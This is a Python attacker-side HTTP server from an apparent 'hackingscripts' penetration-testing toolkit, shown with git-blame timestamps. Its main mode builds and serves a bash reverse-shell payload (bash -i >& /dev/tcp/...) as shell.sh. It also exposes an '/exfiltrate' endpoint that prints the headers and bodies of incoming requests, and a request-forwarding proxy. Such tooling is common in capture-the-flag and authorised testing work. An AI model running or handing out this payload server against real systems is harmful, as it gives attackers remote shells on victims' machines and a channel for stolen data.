2020-09-27 14:00:20 +02:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
from hackingscripts import util
|
2020-09-27 14:00:20 +02:00
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
2020-09-27 14:37:52 +02:00
|
|
|
import threading
|
2020-10-21 21:41:06 +02:00
|
|
|
import requests
|
2020-09-27 14:37:52 +02:00
|
|
|
import sys
|
2020-10-15 14:35:16 +02:00
|
|
|
import os
|
|
|
|
import ssl
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
class FileServerRequestHandler(BaseHTTPRequestHandler):
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def __init__(self, *args, **kwargs):
|
|
|
|
super().__init__(*args, **kwargs)
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def do_POST(self):
|
|
|
|
self.do_GET()
|
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def onForward(self, target):
|
|
|
|
queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
|
|
|
if queryStr:
|
|
|
|
target += "?" if "?" not in target else "&"
|
|
|
|
target += queryStr
|
|
|
|
|
|
|
|
method = self.command
|
|
|
|
res = requests.request(method, target)
|
|
|
|
return res.content, res.status_code
|
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def do_GET(self):
|
2020-10-21 21:41:06 +02:00
|
|
|
|
|
|
|
path = self.server.cleanPath(self.path)
|
|
|
|
if path in self.server.routes:
|
|
|
|
data, code = self.server.routes[path](self)
|
|
|
|
self.send_response(code)
|
2020-09-27 14:00:20 +02:00
|
|
|
self.end_headers()
|
2020-10-21 21:41:06 +02:00
|
|
|
|
|
|
|
if data:
|
|
|
|
self.wfile.write(data)
|
2020-09-27 14:00:20 +02:00
|
|
|
else:
|
|
|
|
self.send_response(404)
|
|
|
|
self.end_headers()
|
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
if path in self.server.dumpRequests:
|
|
|
|
contentLength = self.headers.get('Content-Length')
|
|
|
|
body = None
|
|
|
|
|
|
|
|
if contentLength and int(contentLength) > 0:
|
|
|
|
body = self.rfile.read(int(contentLength))
|
|
|
|
|
|
|
|
print("==========")
|
|
|
|
print(str(self.headers).strip())
|
|
|
|
if body:
|
|
|
|
print()
|
|
|
|
print(body)
|
|
|
|
print("==========")
|
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def log_message(self, format, *args):
|
2020-09-27 14:37:52 +02:00
|
|
|
if self.server.logRequests:
|
2020-10-15 14:35:16 +02:00
|
|
|
super().log_message(format, *args)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
|
|
|
|
def __init__(self, addr, port):
|
|
|
|
super().__init__((addr, port), FileServerRequestHandler)
|
|
|
|
self.logRequests = False
|
2020-10-21 21:41:06 +02:00
|
|
|
self.routes = { }
|
2020-10-15 14:35:16 +02:00
|
|
|
self.dumpRequests = []
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def cleanPath(self, path):
|
|
|
|
|
|
|
|
if "?" in path:
|
|
|
|
path = path[0:path.find("?")]
|
|
|
|
|
|
|
|
if not path.startswith("/"):
|
|
|
|
path = "/" + path
|
|
|
|
|
|
|
|
return path.strip()
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
def addFile(self, name, data):
|
|
|
|
if isinstance(data, str):
|
|
|
|
data = data.encode("UTF-8")
|
2020-10-21 21:41:06 +02:00
|
|
|
|
|
|
|
# return 200 - OK and data
|
|
|
|
self.addRoute(name, lambda req: (data, 200))
|
2020-09-27 14:37:52 +02:00
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def dumpRequest(self, name):
|
2020-10-21 21:41:06 +02:00
|
|
|
self.dumpRequests.append(self.cleanPath(name))
|
|
|
|
|
|
|
|
def addRoute(self, path, func):
|
|
|
|
self.routes[self.cleanPath(path)] = func
|
|
|
|
|
|
|
|
def forwardRequest(self, path, target):
|
|
|
|
self.addRoute(path, lambda req: req.onForward(target))
|
2020-10-15 14:35:16 +02:00
|
|
|
|
|
|
|
def enableLogging(self):
|
|
|
|
self.logRequests = True
|
|
|
|
|
|
|
|
def enableSSL(self, keyFile=None, certFile=None):
|
|
|
|
if keyFile is None:
|
|
|
|
print("Generating certificate…")
|
|
|
|
os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")
|
|
|
|
certFile = "server.crt"
|
|
|
|
keyFile = "private.key"
|
|
|
|
|
|
|
|
self.socket = ssl.wrap_socket(self.socket,
|
|
|
|
server_side=True,
|
|
|
|
certfile=certFile,
|
|
|
|
keyfile=keyFile,
|
|
|
|
ssl_version=ssl.PROTOCOL_TLS,
|
|
|
|
cert_reqs=ssl.CERT_NONE)
|
|
|
|
|
|
|
|
# try:
|
|
|
|
# ssl._create_default_https_context = ssl._create_unverified_context
|
|
|
|
# except AttributeError:
|
|
|
|
# print("Legacy Python that doesn't verify HTTPS certificates by default")
|
|
|
|
# pass
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def startBackground(self):
|
|
|
|
t = threading.Thread(target=self.serve_forever)
|
|
|
|
t.start()
|
|
|
|
return t
|
|
|
|
|
2020-10-21 21:41:06 +02:00
|
|
|
def start(self):
|
|
|
|
return self.serve_forever()
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
if __name__ == "__main__":
|
2020-10-21 21:41:06 +02:00
|
|
|
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
|
|
|
|
print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
|
|
|
|
exit(1)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
fileServer = HttpFileServer("0.0.0.0", 80)
|
2020-10-21 21:41:06 +02:00
|
|
|
ipAddress = util.getAddress()
|
|
|
|
|
|
|
|
if sys.argv[1] == "shell":
|
|
|
|
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
|
|
|
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
|
fileServer.addFile("shell.sh", rev_shell)
|
|
|
|
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
|
elif sys.argv[1] == "dump":
|
|
|
|
fileServer.dumpRequest("/exfiltrate")
|
|
|
|
print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
|
|
|
|
elif sys.argv[1] == "proxy":
|
|
|
|
fileServer.forwardRequest("/proxy", "https://google.com")
|
|
|
|
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
|
|
|
|
|
|
|
fileServer.start()
|